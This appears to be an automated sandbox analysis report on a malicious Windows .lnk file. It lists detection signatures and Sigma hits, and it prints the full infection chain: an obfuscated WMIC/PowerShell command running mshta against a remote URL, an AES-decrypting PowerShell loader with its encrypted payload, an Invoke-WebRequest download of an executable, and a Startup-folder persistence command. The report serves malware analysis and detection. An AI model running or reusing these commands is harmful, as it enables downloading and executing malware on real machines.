Windows Analysis Report
lKin1m7Pf2.lnk

Overview

General Information

Sample name: lKin1m7Pf2.lnk
renamed because original name is a hash value
Original sample name: 2ddf3f1022cce6aa5fd6c09b5275e47e.lnk
Analysis ID: 1579656
MD5: 2ddf3f1022cce6aa5fd6c09b5275e47e
SHA1: 13c4b35087244077015a33b25d2ab5f054f44988
SHA256: 7ffbec4e1d8aacb3a386573d2c90ab9d1d89605a82ecd7dc524c178377ac6043
Tags: lnk, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • WMIC.exe (PID: 3524 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3904 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 4276 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7360 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7576 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7756 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • BnQwAP.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\BnQwAP.exe" MD5: 9624FB616EDBE0DBAFD24F26424CA9E8)
              • powershell.exe (PID: 5544 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 3428 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 7256 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 5544 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • MpCmdRun.exe (PID: 7352 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
              • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 5328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 7220 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7256, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 3428, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7256, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 5544, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6200, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, ProcessId: 4276, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 3428, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1F
D752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B2
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", ProcessId: 3524, ProcessName: WMIC.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5328, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5544, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B2
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7220, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Roaming\BnQwAP.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5328, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 3524, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), ProcessId: 3904, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5448, ProcessName: svchost.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T07:07:55.769895+0100 | 2026434 | 1 | A Network Trojan was detected | 147.45.49.155 | 443 | 192.168.2.8 | 49704 | TCP
2024-12-23T07:08:09.118490+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 147.45.49.155 | 443 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1], ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, ReversingLabs: Detection: 30%
Source: lKin1m7Pf2.lnk, Virustotal: Detection: 25%
Source: lKin1m7Pf2.lnk, ReversingLabs: Detection: 21%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49725 version: TLS 1.2
